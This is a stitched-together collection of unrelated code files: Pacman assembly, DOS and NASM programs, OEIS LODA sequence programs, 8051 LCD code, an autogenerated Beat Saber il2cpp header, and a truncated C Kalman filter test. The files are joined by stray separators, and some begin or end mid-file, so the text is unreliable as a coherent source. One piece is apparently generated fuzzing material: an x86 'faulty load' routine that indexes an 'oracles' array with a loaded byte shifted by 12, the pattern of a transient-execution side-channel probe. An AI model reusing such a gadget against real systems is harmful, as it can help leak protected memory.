CMPI 16 r0
BNE drawUP1 //else check if in state UP1
//check the condition of the mouth
//if open
CMPI 1 R4
BNE CLOSED_STATE_UP0
LUI 1 r1 //load PACMAN_OPEN_UP_0
ORI 8 r1
STOR r1 r0
ADDI -53 r0 //get location below pacman
MOVI 0 r1 //LOAD BLANK
STOR r1 r0
RETX
CLOSED_STATE_UP0:
LUI 0 r1 //load PACMAN_CLOSED_UP_0
ORI 179 r1
STOR r1 r0
ADDI -53 r0 //get location below pacman
MOVI 0 r1 //LOAD BLANK
STOR r1 r0
RETX
//CHECK IF STATE UP1
drawUP1:
LOAD r0 r3
CMPI 17 r0
BNE drawUP2 //else check if in state UP2
//CHECK CONDITION OF MOUTH
//IF OPEN
CMPI 1 R4
BNE CLOSED_STATE_UP1
LOAD r0 r2 //get PACMAN_OPEN_UP1
LUI 1 r1
ORI 9 r1
STOR r1 r0 //store to fb at pacman location
ADDI 53 r0 //get location above pacman
ADDI 1 r1 //get PACMAN_OPEN_UP2
STOR r1 r0 //store at location above pacman
CLOSED_STATE_UP1:
RETX
//STATE UP2
drawUP2:
LOAD r0 r3
CMPI 18 r0
BNE drawUP3 //else check if in state UP3
LOAD r0 r2
LUI 1 r1 //get PACMAN_OPEN_UP3
ORI 11 r1 //store to pacman location
STOR r1 r0 //get location above pacman
ADDI 53 r0
ADDI 1 r1 //get PACMAN_OPEN_UP3
STOR r1 r0 //store to location above pacman
RETX
//STATE UP3
drawUP3:
LOAD r0 r3
CMPI 19 r0
BNE drawDOWN0 //else check if in state DOWN0
LOAD r0 r2
LUI 1 r1
ORI 14 r1
STOR r1 r0 //store to pacman location
RETX
//STATE DOWN0
drawDOWN0:
LOAD r0 r3
CMPI 32 r0
BNE drawDOWN1 //else check if in state DOWN1
LOAD r0 r2
RETX
//STATE DOWN1
drawDOWN1:
LOAD r0 r3
CMPI 33 r0
BNE drawDOWN2
LOAD r0 r2
RETX
//STATE DOWN2
drawDOWN2:
LOAD r0 r3
CMPI 34 r0
BNE drawDOWN3
LOAD r0 r2
RETX
//STATE DOWN3
drawDOWN3:
LOAD r0 r3
CMPI 35 r0
BNE drawLEFT0
LOAD r0 r2
RETX
//STATE LEFT0
drawLEFT0:
LOAD r0 r3
CMPI 48 r0
BNE drawLEFT1
LOAD r0 r2
RETX
//STATE LEFT1
drawLEFT1:
LOAD r0 r3
CMPI 49 r0
BNE drawLEFT2
LOAD r0 r2
RETX
//STATE LEFT2
drawLEFT2:
LOAD r0 r3
CMPI 50 r0
BNE drawLEFT3
LOAD r0 r2
RETX
//STATE LEFT3
drawLEFT3:
LOAD r0 r3
CMPI 51 r0
BNE drawRIGHT0
LOAD r0 r2
RETX
//STATE RIGHT0
drawRIGHT0:
LOAD r0 r3
CMPI 64 r0
BNE drawRIGHT1
LOAD r0 r2
RETX
//STATE RIGHT1
drawRIGHT1:
LOAD r0 r3
CMPI 65 r0
BNE drawRIGHT2
LOAD r0 r2
RETX
//STATE RIGHT2
drawRIGHT2:
LOAD r0 r3
CMPI 66 r0
BNE drawRIGHT3
LOAD r0 r2
RETX
//STATE RIGHT3
drawRIGHT3:
LOAD r0 r3
CMPI 67 r0
BNE drawDEAD1
LOAD r0 r2
RETX
//STATE DEAD1
drawDEAD1:
LOAD r0 r3
CMPI 1 r0
BNE drawDEAD2
LOAD r0 r2
RETX
//STATE DEAD2
drawDEAD2:
LOAD r0 r3
CMPI 2 r0
BNE drawDEAD3
LOAD r0 r2
RETX
//STATE DEAD3
drawDEAD3:
LOAD r0 r3
CMPI 3 r0
BNE drawDEAD4
LOAD r0 r2
RETX
//STATE DEAD4.. if not any state above, draw as dead4
drawDEAD4:
LOAD r0 r2
RETX |
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r8
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1ee98, %rsi
lea addresses_normal_ht+0xcd9c, %rdi
nop
inc %r12
mov $27, %rcx
rep movsl
sub %r9, %r9
lea addresses_UC_ht+0xeb69, %rsi
lea addresses_D_ht+0xd929, %rdi
add $41236, %r8
mov $119, %rcx
rep movsl
nop
add $869, %r9
lea addresses_D_ht+0x8e9, %rdi
nop
nop
and %r9, %r9
mov $0x6162636465666768, %rcx
movq %rcx, %xmm5
movups %xmm5, (%rdi)
sub $27848, %rsi
lea addresses_normal_ht+0x8da9, %rsi
lea addresses_WC_ht+0x17da6, %rdi
nop
nop
nop
nop
nop
add %r8, %r8
mov $84, %rcx
rep movsq
nop
nop
nop
nop
nop
add %r12, %r12
lea addresses_normal_ht+0x103a1, %r9
cmp $15010, %r8
mov $0x6162636465666768, %rdi
movq %rdi, %xmm2
and $0xffffffffffffffc0, %r9
movaps %xmm2, (%r9)
nop
nop
add %r8, %r8
lea addresses_D_ht+0x4a5, %rdi
nop
nop
nop
nop
sub %rbx, %rbx
movl $0x61626364, (%rdi)
nop
nop
nop
cmp %rbx, %rbx
lea addresses_UC_ht+0x9f29, %rsi
lea addresses_UC_ht+0xeb29, %rdi
nop
nop
inc %r10
mov $114, %rcx
rep movsl
nop
nop
nop
nop
nop
and $19968, %rcx
lea addresses_D_ht+0x80a9, %rsi
lea addresses_A_ht+0x8c71, %rdi
nop
nop
sub %r9, %r9
mov $80, %rcx
rep movsl
nop
nop
nop
nop
inc %r9
lea addresses_D_ht+0x16929, %rsi
lea addresses_D_ht+0x1ee29, %rdi
nop
nop
nop
nop
add $59533, %r12
mov $44, %rcx
rep movsq
nop
add $27224, %rsi
lea addresses_WT_ht+0x138b3, %r12
nop
nop
nop
nop
add $54057, %r8
movups (%r12), %xmm0
vpextrq $1, %xmm0, %rsi
xor %r10, %r10
lea addresses_WT_ht+0x1b729, %rsi
lea addresses_A_ht+0x2b29, %rdi
and $18846, %r8
mov $99, %rcx
rep movsl
nop
nop
nop
nop
nop
dec %r10
lea addresses_WC_ht+0x13d29, %rsi
lea addresses_WC_ht+0x17cc9, %rdi
nop
nop
nop
nop
inc %r9
mov $116, %rcx
rep movsl
nop
nop
nop
sub %r10, %r10
lea addresses_D_ht+0x4329, %rsi
lea addresses_A_ht+0x1c9e9, %rdi
nop
nop
nop
xor %r10, %r10
mov $106, %rcx
rep movsq
nop
and $33394, %rbx
lea addresses_WC_ht+0x17f91, %r12
nop
nop
nop
nop
nop
and %r10, %r10
movw $0x6162, (%r12)
nop
cmp $26538, %rcx
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r9
pop %r8
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r14
push %r9
push %rax
push %rbx
push %rsi
// Store
lea addresses_UC+0x8401, %r11
add %r14, %r14
mov $0x5152535455565758, %rsi
movq %rsi, (%r11)
nop
nop
sub %rax, %rax
// Faulty Load
lea addresses_PSE+0x1b29, %rbx
xor $13333, %r9
mov (%rbx), %si
lea oracles, %r9
and $0xff, %rsi
shlq $12, %rsi
mov (%r9,%rsi,1), %rsi
pop %rsi
pop %rbx
pop %rax
pop %r9
pop %r14
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 6, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 9, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 1, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 5, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'33': 1528}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
|
;Program to accept a two-digit number and print it
.model small
.stack 100h
.data
msg db 'Enter the two digit number : $'
.code
main proc
mov ax,@data
mov ds,ax
mov dx,offset msg
mov ah,9
int 21h
mov ah,1
int 21h
mov bl,al
mov ah,1
int 21h
mov cl,al
mov dl,10
mov ah,2
int 21h
mov dl,13
mov ah,2
int 21h
mov dl,bl
mov ah,2
int 21h
mov dl,cl
mov ah,2
int 21h
mov ah,4ch
int 21h
main endp
end main |
; A089821: Number of subsets of {1,.., n} containing exactly one prime.
; 0,2,4,8,12,24,32,64,128,256,320,640,768,1536,3072,6144,7168,14336,16384,32768,65536,131072,147456,294912,589824,1179648,2359296,4718592,5242880,10485760,11534336,23068672,46137344,92274688,184549376,369098752,402653184
mov $4,$0
add $4,1
mov $0,$4
sub $4,2
mov $3,$4
cal $0,230980 ; Number of primes <= n, starting at n=0.
mov $1,$0
mov $2,$0
sub $2,2
sub $3,$2
lpb $3,1
mul $1,2
sub $3,1
lpe
|
; A314706: Coordination sequence Gal.6.130.5 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; 1,5,9,13,18,22,26,30,34,39,43,47,52,57,61,65,70,74,78,82,86,91,95,99,104,109,113,117,122,126,130,134,138,143,147,151,156,161,165,169,174,178,182,186,190,195,199,203,208,213
mov $4,$0
add $4,1
mov $7,$0
lpb $4
mov $0,$7
sub $4,1
sub $0,$4
add $3,1
lpb $3
sub $3,1
mov $5,8
lpb $0
sub $0,1
add $2,$5
add $2,2
div $2,3
gcd $2,2
add $2,2
add $5,$0
lpe
mov $5,$2
add $5,2
lpe
mov $6,$5
sub $6,1
add $1,$6
lpe
|
;16 ALPHA END TO END NON-CONTINUOUS CRAWLING DISPLAY
;10/08/2007
;CHECKED AND TESTED ON AT89C51
;PROGRAM RUN--------SUCCESS
;CHANGE CONTROL : 04-09-2010 LOGIC CHANGED AGAINST USE OF DPTR
;
ORG 0000H ; P1.1-RS
SJMP 0030H ; P1.2-R/W
ORG 0030H ; P1.3-EN
; PORT2 FOR DATA OUT
START: CLR A
MOV P1,A
MOV P2,A
MOV P3,A
INIT: MOV A,#38H
LCALL COMMAND
MOV A,#0CH
LCALL COMMAND
MOV A,#06H
LCALL COMMAND
MOV A,#01H
LCALL COMMAND
MOV DPTR,#CNST
RWRITE: LCALL CLEAR
CLR A
MOV R1,A
MOV R0,#0CFH
MOV R2,A
CYCLE:
MOV A,R0
LCALL COMMAND
INC R2
MOV R1,#00H
DEC R0
CLR A
LOOP: MOV A,R1
MOVC A,@A+DPTR
LCALL DISPLAY
INC R1
MOV A,R1
CJNE A,02H,LOOP
LCALL DELAY
CJNE R2,#10H,CYCLE
SJMP RWRITE
HERE: SJMP HERE
COMMAND:LCALL READY
CLR P1.2
CLR P1.1
MOV P2,A
SETB P1.3
NOP
CLR P1.3
RET
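; READY polls the LCD busy flag on P2.7 (DB7) with RS=0, R/W=1 until the LCD is free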
READY: SETB P2.7
CLR P1.1
SETB P1.2
BUSY: CLR P1.3
SETB P1.3
JB P2.7,BUSY
NOP
CLR P1.3
RET
DISPLAY:LCALL READY
CLR P1.2
SETB P1.1
MOV P2,A
SETB P1.3
NOP
CLR P1.3
RET
DELAY: MOV R7,#04H
WAITC: MOV R6,#0FFH
WAITB: MOV R5,#0FFH
WAITA: DJNZ R5,WAITA
DJNZ R6,WAITB
DJNZ R7,WAITC
RET
CLEAR: MOV A,#01H
LCALL COMMAND
RET
ORG 0F80H
CNST: DB 'wings of fire '
END |
; A027608: Expansion of 1/((1-x)*(1-2x)^4).
; 1,9,49,209,769,2561,7937,23297,65537,178177,471041,1216513,3080193,7667713,18808833,45547521,109051905,258473985,607125505,1414529025,3271557121,7516192769,17163091969,38973472769,88046829569,197971148801,443186937857,988110913537,2194728288257,4857608011777,10715943403521,23566485553153,51677046505473,113009179492353,246496763052033,536355515924481,1164382813814785,2522279674118145,5452478162141185
lpb $0,1
mov $2,$0
sub $0,1
mul $1,2
add $2,3
bin $2,3
add $1,$2
lpe
div $1,4
mul $1,8
add $1,1
|
%include "io.inc"
section .data
%define ARRAY_LEN 7
input dd 122, 184, 199, 242, 263, 845, 911
output times ARRAY_LEN dd 0
section .text
global CMAIN
CMAIN:
; push each input element onto the stack (walking the array backwards)
; and pop it straight into the output array (walking forwards)
mov ecx, ARRAY_LEN
mov eax, 0
reverse_array:
push dword [input + (ecx - 1) * 4]
pop dword [output + eax * 4]
inc eax
loop reverse_array
PRINT_STRING "Reversed array:"
NEWLINE
xor ecx, ecx
print_array:
PRINT_UDEC 4, [output + 4 * ecx]
NEWLINE
inc ecx
cmp ecx, ARRAY_LEN
jb print_array
xor eax, eax
ret
|
// Autogenerated from CppHeaderCreator
// Created by Sc2ad
// =========================================================================
#pragma once
// Begin includes
#include "beatsaber-hook/shared/utils/typedefs.h"
#include "beatsaber-hook/shared/utils/byref.hpp"
// Including type: UnityEngine.MonoBehaviour
#include "UnityEngine/MonoBehaviour.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-properties.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-fields.hpp"
#include "beatsaber-hook/shared/utils/utils.h"
// Completed includes
// Begin forward declares
// Forward declaring namespace: VROSC
namespace VROSC {
// Forward declaring type: TutorialInputDevice
class TutorialInputDevice;
// Forward declaring type: InputDevice
class InputDevice;
// Forward declaring type: HandType
struct HandType;
// Forward declaring type: TriggerButton
struct TriggerButton;
}
// Forward declaring namespace: UnityEngine
namespace UnityEngine {
// Forward declaring type: Color
struct Color;
}
// Completed forward declares
// Type namespace: VROSC
namespace VROSC {
// Forward declaring type: TutorialInputDeviceManager
class TutorialInputDeviceManager;
}
#include "beatsaber-hook/shared/utils/il2cpp-type-check.hpp"
NEED_NO_BOX(::VROSC::TutorialInputDeviceManager);
DEFINE_IL2CPP_ARG_TYPE(::VROSC::TutorialInputDeviceManager*, "VROSC", "TutorialInputDeviceManager");
// Type namespace: VROSC
namespace VROSC {
// Size: 0x28
#pragma pack(push, 1)
// Autogenerated type: VROSC.TutorialInputDeviceManager
// [TokenAttribute] Offset: FFFFFFFF
class TutorialInputDeviceManager : public ::UnityEngine::MonoBehaviour {
public:
public:
// private VROSC.TutorialInputDevice _left
// Size: 0x8
// Offset: 0x18
::VROSC::TutorialInputDevice* left;
// Field size check
static_assert(sizeof(::VROSC::TutorialInputDevice*) == 0x8);
// private VROSC.TutorialInputDevice _right
// Size: 0x8
// Offset: 0x20
::VROSC::TutorialInputDevice* right;
// Field size check
static_assert(sizeof(::VROSC::TutorialInputDevice*) == 0x8);
public:
// Deleting conversion operator: operator ::System::IntPtr
constexpr operator ::System::IntPtr() const noexcept = delete;
// Get instance field reference: private VROSC.TutorialInputDevice _left
[[deprecated("Use field access instead!")]] ::VROSC::TutorialInputDevice*& dyn__left();
// Get instance field reference: private VROSC.TutorialInputDevice _right
[[deprecated("Use field access instead!")]] ::VROSC::TutorialInputDevice*& dyn__right();
// public System.Void .ctor()
// Offset: 0xA2FFEC
template<::il2cpp_utils::CreationType creationType = ::il2cpp_utils::CreationType::Temporary>
static TutorialInputDeviceManager* New_ctor() {
static auto ___internal__logger = ::Logger::get().WithContext("::VROSC::TutorialInputDeviceManager::.ctor");
return THROW_UNLESS((::il2cpp_utils::New<TutorialInputDeviceManager*, creationType>()));
}
// public System.Void Setup(VROSC.InputDevice left, VROSC.InputDevice right)
// Offset: 0xA2FCE0
void Setup(::VROSC::InputDevice* left, ::VROSC::InputDevice* right);
// public System.Void StartButtonBlinking(VROSC.HandType hand, VROSC.TriggerButton trigger, UnityEngine.Color color)
// Offset: 0xA2FD0C
void StartButtonBlinking(::VROSC::HandType hand, ::VROSC::TriggerButton trigger, ::UnityEngine::Color color);
// public System.Void StopButtonBlinking(VROSC.HandType hand, VROSC.TriggerButton trigger, System.Single fadeTime)
// Offset: 0xA2FEEC
void StopButtonBlinking(::VROSC::HandType hand, ::VROSC::TriggerButton trigger, float fadeTime);
// public System.Void StopAllBlinking(VROSC.HandType hand, System.Single fadeTime)
// Offset: 0xA2FF78
void StopAllBlinking(::VROSC::HandType hand, float fadeTime);
// private System.Boolean IsLeftValid(VROSC.HandType hand)
// Offset: 0xA2FDC8
bool IsLeftValid(::VROSC::HandType hand);
// private System.Boolean IsRightValid(VROSC.HandType hand)
// Offset: 0xA2FE58
bool IsRightValid(::VROSC::HandType hand);
}; // VROSC.TutorialInputDeviceManager
#pragma pack(pop)
static check_size<sizeof(TutorialInputDeviceManager), 32 + sizeof(::VROSC::TutorialInputDevice*)> __VROSC_TutorialInputDeviceManagerSizeCheck;
static_assert(sizeof(TutorialInputDeviceManager) == 0x28);
}
#include "beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::New_ctor
// Il2CppName: .ctor
// Cannot get method pointer of value based method overload from template for constructor!
// Try using FindMethod instead!
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::Setup
// Il2CppName: Setup
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::InputDevice*, ::VROSC::InputDevice*)>(&VROSC::TutorialInputDeviceManager::Setup)> {
static const MethodInfo* get() {
static auto* left = &::il2cpp_utils::GetClassFromName("VROSC", "InputDevice")->byval_arg;
static auto* right = &::il2cpp_utils::GetClassFromName("VROSC", "InputDevice")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "Setup", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{left, right});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::StartButtonBlinking
// Il2CppName: StartButtonBlinking
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType, ::VROSC::TriggerButton, ::UnityEngine::Color)>(&VROSC::TutorialInputDeviceManager::StartButtonBlinking)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
static auto* trigger = &::il2cpp_utils::GetClassFromName("VROSC", "TriggerButton")->byval_arg;
static auto* color = &::il2cpp_utils::GetClassFromName("UnityEngine", "Color")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "StartButtonBlinking", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand, trigger, color});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::StopButtonBlinking
// Il2CppName: StopButtonBlinking
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType, ::VROSC::TriggerButton, float)>(&VROSC::TutorialInputDeviceManager::StopButtonBlinking)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
static auto* trigger = &::il2cpp_utils::GetClassFromName("VROSC", "TriggerButton")->byval_arg;
static auto* fadeTime = &::il2cpp_utils::GetClassFromName("System", "Single")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "StopButtonBlinking", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand, trigger, fadeTime});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::StopAllBlinking
// Il2CppName: StopAllBlinking
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType, float)>(&VROSC::TutorialInputDeviceManager::StopAllBlinking)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
static auto* fadeTime = &::il2cpp_utils::GetClassFromName("System", "Single")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "StopAllBlinking", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand, fadeTime});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::IsLeftValid
// Il2CppName: IsLeftValid
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<bool (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType)>(&VROSC::TutorialInputDeviceManager::IsLeftValid)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "IsLeftValid", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::IsRightValid
// Il2CppName: IsRightValid
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<bool (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType)>(&VROSC::TutorialInputDeviceManager::IsRightValid)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "IsRightValid", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand});
}
};
|
.text "Hello World"
ldca $a .text
pushi $a ;; push the address on the stack, so that print_string can use it
call :print_string ;; call the print_string subroutine
jmp :exit ; exit out of the program
printi #11 ; shouldn't get invoked, because we are jumping to the :exit label
;;
;; Prints the supplied string to sysout
;;
;; input:
;; <address> to string constant, retrieved from top of the stack
;; output:
;; <void>
;;
:print_string
popi $a ;; stores the address of the string constant
:print_loop
ifb &$a #0 ;; loops until the value at address $a = 0; strings are null terminated
jmp :print_end_loop
printc &$a ;; prints out the ASCII byte character
addi $a #1 ;; increments to the next character byte
jmp :print_loop
:print_end_loop
ret ;; the call stored the return $pc in the $r register; RET sets $pc to the value of $r
:exit |
; A322029: Denominator of least value of the squared diameters of the enclosing circles of all strictly convex lattice n-gons with minimal area given by A070911. Numerators are A321693.
; 1,1,9,1,1,1,49,1,1,1,1,1,1,1,169,1,1,1,1,1,1,1,1,1
mov $3,2
mov $7,$0
lpb $3,1
mov $0,$7
sub $3,1
add $0,$3
trn $0,1
add $0,2
log $0,2
mov $2,$3
mov $5,$0
add $5,4
mov $6,$5
bin $6,6
mov $4,$6
lpb $2,1
mov $1,$4
sub $2,1
lpe
lpe
lpb $7,1
sub $1,$4
mov $7,0
lpe
mul $1,8
add $1,1
|
/* Kalman filter algorithm test */
#include "KalmanFilterTest.h"
double frand()
{
return 2 * ((rand() / (double)RAND_MAX) - 0.5);// uniform random noise in [-1, 1]
}
void KalmanFiterTest()
{
float x_last = 0;
float p_last = 0.02;
float Q = 0.018;
float R = 0.542;
float kg;
float x_mid;
float x_now;
float p_mid;
float p_now;
float z_real = 0.56;
float z_measure;
float summerror_kalman = 0;
float summerror_measure = 0;
int i;
x_last = z_real + frand()*0.03;
x_mid = x_last;
for (i = 0; i < 20;i++)
{
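/* one scalar Kalman iteration:
predict: x_mid = x_last, p_mid = p_last + Q
update:  kg = p_mid / (p_mid + R)
x_now = x_mid + kg * (z_measure - x_mid)
p_now = (1 - kg) * p_mid */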
x_mid = x_last;
p_mid = p_last + Q;
kg = p_mid / (p_mid + R);
z_measure = z_real + frand()*0.03;// measured value
x_now = x_mid + kg*(z_measure - x_mid);// optimal (a posteriori) estimate
p_now = (1 - kg)*p_mid;// covariance of the optimal estimate
printf("Real position:%6.3f\n", z_real);
printf("Measure position:%6.3f [diff:%.3f]\n", z_measure, fabs(z_real - z_measure));
printf("Kalman position: %6.3f [diff:%.3f]\n", x_now, fabs(z_real - x_now));
printf("\n\n");
summerror_kalman += fabs(z_real - x_now);
summerror_measure += fabs(z_real - z_measure);
p_last = p_now;
x_last = x_now;
}
